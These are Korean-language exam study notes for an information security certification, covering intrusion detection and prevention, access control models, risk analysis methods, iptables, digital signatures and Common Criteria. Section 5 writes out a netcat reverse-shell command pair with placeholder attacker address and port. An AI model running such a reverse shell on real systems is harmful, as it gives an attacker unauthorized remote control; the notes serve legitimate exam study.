정보보안기사 정보보안일반(수정, 추가)

1. 침입탐지시스템(IDS: Intrusion Detection System)
 : 보안 공격이 발생했을 때, 이를 탐지하고 로그를 남겨 관리자가 적절한 대처를 할 수 있도록 해주는 시스템
 : 방화벽(IP, Port 기반)은 패킷 필터링 기반의 차단장비인 반면, IDS는 전달되는 패킷의 내용, 시스템 로그 등을 분석하여 공격여부를 판단하는 탐지 장비

 

 1) 탐지 방법에 의한 분류
  ㄱ. 지식기반, 오용탐지, 시그니처기반 탐지
           오탐이 낮으며, 전문가 시스템, 알려진 공격 패턴에 강함
           미탐이 높으며, 패턴에 없는 새로운 공격 패턴에 약함

  ㄴ. 행위기반, 이상탐지, 비정상행위 탐지
           정상 행위를 벗어나는 데이터를 탐지, 미탐이 낮으며, 알려지지 않은 공격에 강함
           오탐이 높으며, 정상과 비정상 구분의 어려움이 있음

 

 2) 데이터 수집원에 의한 분류
  ㄱ. 호스트 기반(Host-based IDS)
           : 서버에 직접 설치(네트워크 환경과 무관)되며, 호스트의 자원 사용 기록, 로그자료를 통해 호스트로의 침입여부 및 침입성공여부 탐지, 내부자 공격탐지/차단 가능, 무결성 점검
           : 해커에 의한 로그 자료의 변조 가능성, Dos 공격으로 IDS 무력화 가능
           : Tripwire(무결성 점검도구)

  ㄴ. 네트워크 기반(Network-based IDS)
           : 네트워크 환경에서 실행되어 개발, 서버의 성능저하가 없음, 네트워크에서 발생하는 여러 유형 탐지가능, 해커의 IDS 공격에 대한 방어가 가능
           : 암호화된 네트워크 패킷에 대해서는 침입탐지 불가능, 트래픽 증가, 오탐률 높음
           : Snort(Sniffer and More)

 

2. 침입방지시스템(IPS: Intrusion Prevention System)
 : 시스템 또는 네트워크에 대한 다양한 침입 행위를 실시간 탐지, 분석하여 공격 패킷 자동 차단
 : IPS의 경우 관리자에게 보고 뿐만 아니라 능동적인 차단 수행
 : 게이트웨이/인라인 방식 사용, 모든 전달되는 패킷이 IPS를 거쳐 지나가는 방식으로 직접 차단 가능, But 네트워크 장애가 발생할 위험성 존재

 

3. 정보보안 일반/관리
 1) 정보보호 목표는 기밀성, 무결성, 가용성을 보장하는 것
 2) 정보보호관리는 물리적, 기술적, 관리적 대책을 통해 기업과 조직의 목적을 충족시키면서 위험을 수용 가능한 수준으로 낮추는 것
 - 자산: 조직이 보호해야될 대상
 - 취약점: 위협의 이용대상으로 관리적, 물리적, 기술적 약점
 - 위협: 손실이나 손상의 원인을 제공하는 집합

 

 3) 접근통제 정책
 - MAC: 허용등급과 자료 범위를 비교해 권한 부여
           정책은 경직되고 구현 어려움, 방화벽
 - DAC: 객체의 소유자는 주체의 신분에 따라 임의적으로 접근을 통제
           유연하며 구현 쉬움, ACL
 - RBAC: 주체와 객체 사이의 역할에 따라 접근 통제
           인사이동이 잦은 경우 관리 용이, Non-DAC, HIPAA

항목	MAC	DAC	RBAC
정의	주체와 객체의 등급을 비교하여 접근 권한을 부여하는 접근통제	접근하고자 하는 주체의 신분에 따라 접근권한을 부여하는 접근통제	주체와 객체 사이에 역할을 부여하여 임의적, 강제적 접근통제의 약점 보완
권한부여	System	객체 소유자	중앙관리자
접근결정	보안 등급(Security Label)	신분	역할(Role)
정책	경직	유연	유연
장점	중앙집중, 안정적	유연함, 구현 용이	관리 용이
단점	구현 및 운영의 어려움, 성능, 비용 고가	트로이목마에 취약, ID 도용 시 통제불가
적용 사례	방화벽	ACL	HIPAA

 

 4) 정보보호정책서
 - 조직의 정보보호에 대한 방향과 전략근거를 제시
 - 조직의 정보자산에 접근할 모든 사람들이 따를 규칙 등을 기술한 지침과 규약
 - 경영진의 승인 필요, 포괄적, 일반적, 개괄적으로 기술된 문서

 

 5) 위험관리(위험분석, 위험평가를 내포하는 의미이기도함)
 : 위험을 수용 가능한 수준으로 유지하기 위해 자산 및 시스템의 위험을 평가하고 비용, 효과적인 대응책을 수립하는 일련의 과정

 

- 위험분석 방법
 ㄱ. 기준선 접근법(Baseline Approach)
 : 소규모 조직에 적합, 시간과 노력 절약
  보안정책 등을 참고해서 작성한 통제사항 체크리스트 마련

 ㄴ. 상세위험분석(Detailed Risk Analysis)
 : 모든 위험이 식별되고 시스템에 꼭 필요한 대책 구현 가능, 많은 시간과 비용 필요

 ㄷ. 복합접근법(Combined Approach)
 : 고위험영역은 상세위험분석, 나머지는 기준선접근법 이용

  비용과 자원의 효과적 사용, 고위험식별 중요

 ㄹ. 비정형접근법(Informal Approach)
 : 개인의 전문성 활용으로 신속, 저렴, 주관적

 

 - 정량적분석: 위험을 금액으로 산정 가능 시, 성능 평가 용이, 객관적 평가 기준 제공, 많은 시간과 비용, 계산 복잡
 ㄱ. 과거자료분석법
 ㄴ. 수학공식법
 ㄷ. 연간예산손실법
 ㄹ. 점수법
 ㅂ. 확률분포법

 

 - 정성적분석: 자산을 금액으로 산정 불가능할 경우, 경험이나 판단에 근거하여, 주관적
 ㄱ. 델파이법
 ㄴ. 순위결정법
 ㄷ. 시나리오법
 ㄹ. 퍼지행렬법

 

 6) 위험평가
 : 위험분석 결과를 바탕으로 위험의 대응 여부와 우선순위를 결정하는 것

 

 7) 위험처리 전략
 ㄱ. 위험감소(Reduction): 대책을 구현해 위험을 감소시킴
 ㄴ. 위험수용(Acceptance): 잠재적 손실비용을 감수하고 수행
 ㄷ. 위험전가(Transfer): 제 3자에게 잠재비용을 이전하거나 할당(보험, 외주 등)
 ㄹ. 위험회피(Avoidance): 위험이 존재하는 사업, 프로세스 포기

 

4. iptables
: 패킷 필터링 기능을 가지고 있는 리눅스 커널에 내장된 netfilter 기능을 관리하기 위한 툴
: 상태추적 기능 제공(방화벽을 통과하는 모든 패킷에 대한 연결 상태를 추적하여 이 정보를 메모리에 기억하고 있다가 기존의 연결을 가장하여 접근할 경우 메모리에 저장된 상태 목록과 비교하여 적합하면 통과하고 그렇지 않으면 거부하는 기능)
: NAT 기능, 패킷 레벨에서의 로깅기능, 확장모듈을 통한 다양한 기능 등의 제공

 

 1) 사용법
: iptables [테이블] [체인] [룰] [타겟]
: TCP/UDP의 경우 포트 번호를 통해 서비스를 식별 ex) --s/dport 23, 1024:(1024이상), :6551(이하)
: ICMP의 경우 타입과 코드를 통해서 메시지를 식별
           ex) --icmp-type [메시지타입], --icmp-type echo-request => Request 메시지를 의미
: 규칙은 위에서 아래로 순차적 적용, 첫 번째 줄에 해당사항이 있으면 그 명령대로 하고, 그렇지 않으면 다음 규칙으로 보냄

 

5. Netcat(nc)를 이용한 리버스 쉘(Reverse Shell)
 1) Attacker 시스템: nc -lp 8080(포트번호)
 2) victim 시스템: nc.exe [공격자 주소] [리스닝포트] -e [shell or cmd 등]

 

6. 이산대수문제의 어려움
Diffie-Hellman, DSS, KCDSA, ElGamal

 

7. 전자서명
 1) 주요 기능
 ㄱ. 위조 불가: 합법적인 서명자만이 전자서명을 생성하는 것이 가능
 ㄴ. 서명자 인증: 전자서명의 서명자를 불특정 다수가 검증할 수 있어야함
 ㄷ. 변경 불가: 서명한 문서의 내용을 변경할 수 없어야 함
 ㄹ. 재사용 불가: 전자문서의 서명을 다른 전자문서의 서명으로 사용할 수 없어야 함
 ㅁ. 부인방지: 서명자는 서명행위 이후에 서명한 사실을 부인할 수 없어야 함

 

9. 라이프사이클 구성 4단계
: ISO(국제표준화기구)에서 제시하는 정보보호관리체계의 라이프사이클을 구성한느 단계를 크게 4가지로 구분한다면 Plan(계획), Do(실행), Check(점검) 및 Act 단계로 구분할 수 있다. Plan은 정보보호관리체계를 수립하는 단계를 말하며, Do는 이 체계를 운영하는 단계이며, Check에서는 운영되고 있는 체계를 점검하고 마지막 Act 단계에서는 이 체계를 향상시킨다.
: 정보보호관리체계는 적절한 수준의 기밀성, 무결성, 가용성, 책임추적성, 인증 및 신뢰성을 유지하기 위해 사용되는 절차를 말한다.

 

10. 정보보호대책은 평가된 위험을 허용 가능한 수준으로 줄이기 위한 안전대책, 통제 혹은 위협을 감소시키기 위한 정보보호조치를 의미
 1) 예방통제: 사전에 위협과 취약점에 대처하는 통제로 발생 가능한 잠재적인 문제들을 식별하여 사전에 대처하는 능동적인 개념의 통제

 2) 탐지통제: 위협을 탐지하는 통제로 예방통제를 우회하여 발생되는 문제점 찾아내기 위한 통제
 3) 교정통제: 탐지된 위협이나 취약점에 대처, 위협을 줄이거나 취약점을 감소시키는 통제

 

11. 보호 대책
 1) 관리적 보호대책: 보안정책, 보안지침, 보안절차, 보안조직 등으로 나눠진다.
                     : 법/제도/규정/교육 등을 확립하고, 보안계획을 수립하고, 운영하며, 위험분석 및 보안감사를 시행하여 정보시스템의 안전성과 신뢰성을 확보하기 위한 대책
 2) 기술적 보호대책: 네트워크 보안, 서버 보안, PC 보안, 통합 관리 등으로 나눠진다.
                     : 정보 시스템, 통신망, 데이터를 보호하기 위한 기본적인 대책
 3) 물리적 보호대책: 출입통제, 작업통제, 전원대책, 장비보안 등으로 나눠진다.
                     : 자연재해로, 불순세력으로부터 정보시스템이 위치한 정보처리시설 보호 대책

 

12. 정보시스템 공통평가기준(CC: Common Criteria)
 1) 보호프로파일(PP: Protection Profile): 보안솔루션의 기능 및 보증과 관련된 공통 요구사항
 2) 보안목표명세서(ST: Security Target): PP에서 정의된 요구사항이 실제 제품으로 평가되기 위한 기능명세서
 3) 평가대상(TOE: Target Of Evaluation): 평가대상이 되는 제품 또는 시스템
 4) 평가보증등급(EAL: Evaluation Assurance Level): 보증요구와 관련된 컴포넌트의 집합으로 구성된 패키지의 일종으로 보안성이 낮은 EAL1부터 높은 EAL7까지 있다.